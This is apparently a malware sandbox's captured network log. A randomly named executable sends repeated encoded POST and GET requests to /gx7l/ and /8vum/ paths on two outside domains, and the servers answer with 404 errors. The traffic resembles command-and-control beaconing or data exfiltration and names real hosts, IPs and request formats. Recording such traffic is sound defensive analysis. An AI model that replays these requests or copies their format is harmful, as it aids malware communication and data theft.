Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:44.063736916 CEST	792	OUT	POST /gx7l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.hermandadcoyotes.com Origin: http://www.hermandadcoyotes.com Referer: http://www.hermandadcoyotes.com/gx7l/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 58 35 4a 54 4f 71 33 61 52 54 36 33 6d 48 35 42 64 72 57 37 77 73 57 4e 31 75 6c 64 70 47 68 2b 61 57 58 52 73 36 73 54 32 70 73 36 7a 4c 4d 57 57 4b 67 6b 42 6e 6e 75 6c 69 31 68 37 4c 46 79 37 61 68 42 74 58 63 63 58 34 66 66 7a 45 5a 41 4d 72 39 68 42 68 39 77 63 36 58 58 7a 4e 50 64 4c 55 43 31 39 75 74 4a 2b 32 71 6d 31 33 70 67 64 58 35 49 75 47 4b 77 59 79 44 6e 39 79 33 7a 39 44 65 6f 5a 71 39 62 62 30 4f 37 6f 47 71 35 34 52 50 50 2b 53 68 4b 37 44 56 2f 39 38 48 69 69 38 52 6e 6a 61 4e 77 38 65 6c 30 4a 5a 75 6c 64 33 6f 47 30 55 4d 7a 42 67 34 49 63 46 66 78 37 71 33 4c 68 76 70 38 4c 68 59 4b 41 58 73 53 4f 68 5a 74 51 61 75 33 6f 57 72 74 77 7a 45 54 47 67 3d 3d Data Ascii: 9Fjx=X5JTOq3aRT63mH5BdrW7wsWN1uldpGh+aWXRs6sT2ps6zLMWWKgkBnnuli1h7LFy7ahBtXccX4ffzEZAMr9hBh9wc6XXzNPdLUC19utJ+2qm13pgdX5IuGKwYyDn9y3z9DeoZq9bb0O7oGq54RPP+ShK7DV/98Hii8RnjaNw8el0JZuld3oG0UMzBg4IcFfx7q3Lhvp8LhYKAXsSOhZtQau3oWrtwzETGg==
Jul 27, 2024 08:07:44.696389914 CEST	479	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:07:44 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	62415	188.95.113.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:46.850450039 CEST	1805	OUT	POST /gx7l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.hermandadcoyotes.com Origin: http://www.hermandadcoyotes.com Referer: http://www.hermandadcoyotes.com/gx7l/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 58 35 4a 54 4f 71 33 61 52 54 36 33 6d 48 35 42 64 72 57 37 77 73 57 4e 31 75 6c 64 70 47 68 2b 61 57 58 52 73 36 73 54 32 6f 55 36 7a 5a 30 57 58 70 49 6b 41 6e 6e 75 6b 69 31 78 37 4c 46 7a 37 61 70 46 74 58 51 54 58 36 58 66 79 6e 52 41 49 75 52 68 59 52 39 77 56 61 58 57 33 4e 50 49 4c 55 53 4c 39 75 64 4a 2b 32 71 6d 31 31 42 67 61 47 35 49 73 47 4b 7a 52 53 44 72 33 53 33 62 39 41 75 53 5a 71 35 68 62 46 75 37 70 6c 43 35 72 54 58 50 38 79 68 45 36 44 56 6e 39 38 62 48 69 38 4e 46 6a 61 70 61 38 5a 4e 30 49 73 7a 79 4a 57 4d 6b 6f 56 49 53 59 67 77 55 59 51 43 44 6a 49 7a 4b 69 70 70 38 4b 44 6f 38 5a 58 34 66 4b 42 6c 73 53 4a 75 31 6d 52 44 2b 2b 41 6c 49 57 7a 72 50 48 52 41 59 69 67 50 75 37 65 42 4a 2b 44 5a 73 34 73 4c 75 74 5a 70 6a 4e 74 53 5a 4b 53 49 4d 63 63 4d 53 38 61 61 48 67 4e 4b 5a 37 5a 41 6c 42 6c 4e 4c 42 38 71 38 45 47 62 76 77 32 72 69 41 53 53 64 36 42 45 6e 38 38 58 45 54 55 4f 57 4f 51 6d 77 45 65 30 76 6a 53 76 37 4e 62 6d 62 43 37 37 79 56 39 61 67 75 [TRUNCATED] Data Ascii: 9Fjx=X5JTOq3aRT63mH5BdrW7wsWN1uldpGh+aWXRs6sT2oU6zZ0WXpIkAnnuki1x7LFz7apFtXQTX6XfynRAIuRhYR9wVaXW3NPILUSL9udJ+2qm11BgaG5IsGKzRSDr3S3b9AuSZq5hbFu7plC5rTXP8yhE6DVn98bHi8NFjapa8ZN0IszyJWMkoVISYgwUYQCDjIzKipp8KDo8ZX4fKBlsSJu1mRD++AlIWzrPHRAYigPu7eBJ+DZs4sLutZpjNtSZKSIMccMS8aaHgNKZ7ZAlBlNLB8q8EGbvw2riASSd6BEn88XETUOWOQmwEe0vjSv7NbmbC77yV9aguB6ajn7SbpocUPX4MpF7+QmfCZr6ykomHxVc8NJR1cPuR5S2j2lGVt5iQU2+ZIykzJdUFxMu837My5CcsXUjfgwSqrhgTm33EO91vZAsvD+oaVhgu3RvaikXGQr+eGBMqVrnA4AL/4/uxm5t2vzbVQxbNA0hP6ZXXbsAbH3Z+sd+cyRqcOiQzJW9SDdFmoZPQkgmIIiz8xmIre8apOaRecR4fd92SDAAcVFEe2HePf/faigZBVqz0AFuv+g1glqgUX/lkaBkFv01EwSBbD7CPR+DLd5ybEhA7p1rJ2uy27avDCd2a0DUBxtrwSRLUMLxFbceTRqcIJtYH9WYp+InMgKiR55QMetIPZAAyBH7y1SG18DjaBdunS1yjjQdJTw/zrV/ApnigXeqOBWOtihIAZvd3p+oEWxFpaEY8+pFgAiGC6+wMkh7lp9jBU1ROXujvtR4ljG9Bx/YrGnLtsB9R5j+7Dk6CE5FhIZeo711mrOZmyaYYQhS6L8FtH9eVmGEZslJ9l/jR4vef99agpK82zDpdtckcu/XZ6QFe3SPfQeE/V1ru5NZtQoV7MCSJSnpfwrS7dJzD4WpYpaWWxBSN9GYSYC9nc8kkqZM1QU+csS0gyEb2u9/sBviRR3fU6NypL5lupKbDBMjD4dAn+tYN2N94GUvMj6az7D [TRUNCATED]
Jul 27, 2024 08:07:47.510189056 CEST	479	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:07:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	62416	188.95.113.62	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:49.498707056 CEST	492	OUT	GET /gx7l/?9Fjx=a7hzNdnkeS27kktwRLGSx8yR2sA6hGpGYEa4s+kW8/8nhO4qbMwiGFPThwQr7Jt1vJRCiF4mQ47wrk5EK+BQCUwjbLnD+Licdnqi1ONE6USu+A5nC085uF77bSHLzlvxtDSsS9g=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.hermandadcoyotes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:07:50.078602076 CEST	479	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:07:49 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	62417	202.52.146.180	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:55.742099047 CEST	765	OUT	POST /8vum/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.desakedungpeluk.com Origin: http://www.desakedungpeluk.com Referer: http://www.desakedungpeluk.com/8vum/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 4f 6f 7a 33 68 75 4a 41 46 4f 64 75 4c 2b 51 53 67 36 6d 39 76 58 36 66 45 61 68 6f 69 59 68 5a 73 74 54 66 55 79 68 4d 4a 46 66 6e 52 63 7a 63 46 78 77 78 64 68 63 4f 73 57 51 30 30 34 39 62 6a 34 45 6d 62 4c 45 4b 37 76 2f 72 4e 6b 36 79 76 74 7a 33 50 46 34 71 58 4c 56 6d 46 4c 53 38 4c 34 54 34 4e 67 4a 50 4d 52 61 61 58 56 2b 55 72 58 37 51 59 5a 5a 78 38 6d 6f 58 33 2f 34 4e 4f 55 70 38 30 70 79 46 49 4a 76 55 6a 6b 6c 4f 32 37 63 53 54 78 54 62 57 73 78 54 41 62 78 5a 7a 55 30 52 47 79 49 4f 4c 4a 73 6c 4f 33 61 6f 69 4e 7a 72 70 4f 6f 79 70 4d 77 74 32 6c 4b 6d 4f 45 71 68 39 52 6b 37 44 44 36 Data Ascii: 9Fjx=rOoz3huJAFOduL+QSg6m9vX6fEahoiYhZstTfUyhMJFfnRczcFxwxdhcOsWQ0049bj4EmbLEK7v/rNk6yvtz3PF4qXLVmFLS8L4T4NgJPMRaaXV+UrX7QYZZx8moX3/4NOUp80pyFIJvUjklO27cSTxTbWsxTAbxZzU0RGyIOLJslO3aoiNzrpOoypMwt2lKmOEqh9Rk7DD6
Jul 27, 2024 08:07:56.731553078 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 27 Jul 2024 06:07:56 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jul 27, 2024 08:07:56.731563091 CEST	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	62418	202.52.146.180	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:58.598330975 CEST	789	OUT	POST /8vum/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.desakedungpeluk.com Origin: http://www.desakedungpeluk.com Referer: http://www.desakedungpeluk.com/8vum/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 4f 6f 7a 33 68 75 4a 41 46 4f 64 38 61 75 51 54 44 53 6d 31 76 58 35 52 6b 61 68 78 79 59 74 5a 74 52 54 66 56 32 78 4e 37 68 66 6b 30 67 7a 64 42 6c 77 79 64 68 63 47 4d 57 52 77 30 34 32 62 6a 6c 37 6d 5a 76 45 4b 37 37 2f 72 4d 55 36 79 59 42 30 34 2f 46 32 69 33 4c 54 37 31 4c 53 38 4c 34 54 34 4e 6b 77 50 4d 70 61 61 6d 6c 2b 46 35 76 30 54 59 5a 65 32 38 6d 6f 54 33 2f 30 4e 4f 56 4d 38 77 78 49 46 4b 42 76 55 69 55 6c 50 6c 6a 64 4a 6a 77 59 47 47 74 44 64 77 71 72 66 31 55 35 65 46 66 72 4f 72 70 32 70 59 32 41 30 52 4e 51 35 35 75 71 79 72 55 43 74 57 6c 67 6b 4f 38 71 7a 71 64 44 30 33 6d 5a 47 66 45 5a 62 6c 62 42 32 78 34 53 37 66 65 68 72 58 49 48 76 51 3d 3d Data Ascii: 9Fjx=rOoz3huJAFOd8auQTDSm1vX5RkahxyYtZtRTfV2xN7hfk0gzdBlwydhcGMWRw042bjl7mZvEK77/rMU6yYB04/F2i3LT71LS8L4T4NkwPMpaaml+F5v0TYZe28moT3/0NOVM8wxIFKBvUiUlPljdJjwYGGtDdwqrf1U5eFfrOrp2pY2A0RNQ55uqyrUCtWlgkO8qzqdD03mZGfEZblbB2x4S7fehrXIHvQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	62419	202.52.146.180	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:01.174009085 CEST	1802	OUT	POST /8vum/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.desakedungpeluk.com Origin: http://www.desakedungpeluk.com Referer: http://www.desakedungpeluk.com/8vum/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 4f 6f 7a 33 68 75 4a 41 46 4f 64 38 61 75 51 54 44 53 6d 31 76 58 35 52 6b 61 68 78 79 59 74 5a 74 52 54 66 56 32 78 4e 37 70 66 6b 47 34 7a 53 44 4e 77 39 39 68 63 46 4d 57 55 77 30 34 6e 62 6a 74 33 6d 5a 53 78 4b 34 44 2f 78 75 73 36 35 4b 35 30 6a 50 46 32 39 48 4c 57 6d 46 4c 4c 38 4c 70 61 34 4e 30 77 50 4d 70 61 61 6c 39 2b 56 62 58 30 56 59 5a 5a 78 38 6d 73 58 33 2b 64 4e 4f 4d 78 38 77 39 59 47 36 68 76 56 43 45 6c 4e 58 37 64 46 6a 77 61 56 32 74 62 64 77 6e 31 66 31 68 41 65 45 71 38 4f 6f 31 32 71 70 62 64 75 69 39 4b 6c 4b 65 49 6d 4d 55 48 67 32 56 51 69 49 67 6c 37 71 5a 48 39 46 75 6c 66 71 73 46 53 57 33 45 33 51 73 63 34 49 66 58 69 45 4a 71 77 46 5a 56 4d 74 66 39 31 67 45 66 51 70 45 32 68 79 61 76 6e 70 62 2b 53 47 77 53 63 2b 48 33 33 57 45 70 68 49 45 6c 4c 53 59 72 65 6d 35 52 56 58 65 5a 4b 55 70 55 52 74 45 70 68 4e 74 50 4f 78 48 74 6e 57 7a 48 35 32 48 5a 33 74 37 34 71 59 37 55 43 6d 42 41 4f 4a 6d 30 51 67 41 33 44 68 52 58 6f 4e 6d 6d 49 68 34 46 5a [TRUNCATED] Data Ascii: 9Fjx=rOoz3huJAFOd8auQTDSm1vX5RkahxyYtZtRTfV2xN7pfkG4zSDNw99hcFMWUw04nbjt3mZSxK4D/xus65K50jPF29HLWmFLL8Lpa4N0wPMpaal9+VbX0VYZZx8msX3+dNOMx8w9YG6hvVCElNX7dFjwaV2tbdwn1f1hAeEq8Oo12qpbdui9KlKeImMUHg2VQiIgl7qZH9FulfqsFSW3E3Qsc4IfXiEJqwFZVMtf91gEfQpE2hyavnpb+SGwSc+H33WEphIElLSYrem5RVXeZKUpURtEphNtPOxHtnWzH52HZ3t74qY7UCmBAOJm0QgA3DhRXoNmmIh4FZW7dXCUmbpj1v0v5/Xcn4tYVR+gER+UKKNEcFyCAPujhrW/+ppABAGV0KJaefYNGOfAymV5VO5iHbah9GAICyppByUkZ8iJX6VgDgPgaTy7u8PhRSER0y9QMWy7UDn7GhdHaYfbePctoJ+FzyFCXMN1P+MWSFu4z9BxPJ1gIxYJM2ypJEtuqQHpmfFeOjDFCiexvtMQQvZVAWJoo8llH75p8vfPxgl8d3pSOfwMPlezC43GOBytiBBmOkQtav5CTL7ME8PpZtzJQoa+hSpTN1IxpDsRy14DAanLrwvDa0A0A2UtdjrBUP9ddTSWe484mjl42Io7K/fhVUKrLAImq4BhUg19IKlzvBISCAVb0FZkrrcbs4lynQnX/mepGmUDUxdfZGJWfZK9D4XpSjpH3rnouHGsHXD/GP8Vp9JPoc3onenvxYyQHeYAEPo1WYJNdkZkWCUzply1GNZLvE0CRynaiN3u4QHZGY6u0/lhFGe3eZKagburWub/tz3CO2iw94VMzO56wyi1ST6t4rrQGOlZlaFpDLDAkSht6D7tEV0BAIhWbmKEwyIO0An/qzr/4jgTV1XEfzQdkkcYI9vZldH7fW+PD56mweHwWUzzDnQzfwsEMyfJgR8INyA5w4jGjwrHHgCZHK59sRw78A5J0pdMGJQcQeqqB49O [TRUNCATED]
Jul 27, 2024 08:08:01.210483074 CEST	1236	OUT	Data Raw: 33 68 75 4a 41 46 4f 64 38 61 75 51 54 44 53 6d 31 76 58 35 52 6b 61 68 78 79 59 74 5a 74 52 54 66 56 32 78 4e 37 70 66 6b 47 34 7a 53 44 4e 77 39 39 68 63 46 4d 57 55 77 30 34 6e 62 6a 74 33 6d 5a 53 78 4b 34 44 2f 78 75 73 36 35 4b 35 30 6a 50 Data Ascii: 3huJAFOd8auQTDSm1vX5RkahxyYtZtRTfV2xN7pfkG4zSDNw99hcFMWUw04nbjt3mZSxK4D/xus65K50jPF29HLWmFLL8Lpa4N0wPMpaal9+VbX0VYZZx8msX3+dNOMx8w9YG6hvVCElNX7dFjwaV2tbdwn1f1hAeEq8Oo12qpbdui9KlKeImMUHg2VQiIgl7qZH9FulfqsFSW3E3Qsc4IfXiEJqwFZVMtf91gEfQpE2hyavnpb
Jul 27, 2024 08:08:01.522439003 CEST	1236	OUT	POST /8vum/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.desakedungpeluk.com Origin: http://www.desakedungpeluk.com Referer: http://www.desakedungpeluk.com/8vum/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 4f 6f 7a 33 68 75 4a 41 46 4f 64 38 61 75 51 54 44 53 6d 31 76 58 35 52 6b 61 68 78 79 59 74 5a 74 52 54 66 56 32 78 4e 37 70 66 6b 47 34 7a 53 44 4e 77 39 39 68 63 46 4d 57 55 77 30 34 6e 62 6a 74 33 6d 5a 53 78 4b 34 44 2f 78 75 73 36 35 4b 35 30 6a 50 46 32 39 48 4c 57 6d 46 4c 4c 38 4c 70 61 34 4e 30 77 50 4d 70 61 61 6c 39 2b 56 62 58 30 56 59 5a 5a 78 38 6d 73 58 33 2b 64 4e 4f 4d 78 38 77 39 59 47 36 68 76 56 43 45 6c 4e 58 37 64 46 6a 77 61 56 32 74 62 64 77 6e 31 66 31 68 41 65 45 71 38 4f 6f 31 32 71 70 62 64 75 69 39 4b 6c 4b 65 49 6d 4d 55 48 67 32 56 51 69 49 67 6c 37 71 5a 48 39 46 75 6c 66 71 73 46 53 57 33 45 33 51 73 63 34 49 66 58 69 45 4a 71 77 46 5a 56 4d 74 66 39 31 67 45 66 51 70 45 32 68 79 61 76 6e 70 62 2b 53 47 77 53 63 2b 48 33 33 57 45 70 68 49 45 6c 4c 53 59 72 65 6d 35 52 56 58 65 5a 4b 55 70 55 52 74 45 70 68 4e 74 50 4f 78 48 74 6e 57 7a 48 35 32 48 5a 33 74 37 34 71 59 37 55 43 6d 42 41 4f 4a 6d 30 51 67 41 33 44 68 52 58 6f 4e 6d 6d 49 68 34 46 5a [TRUNCATED] Data Ascii: 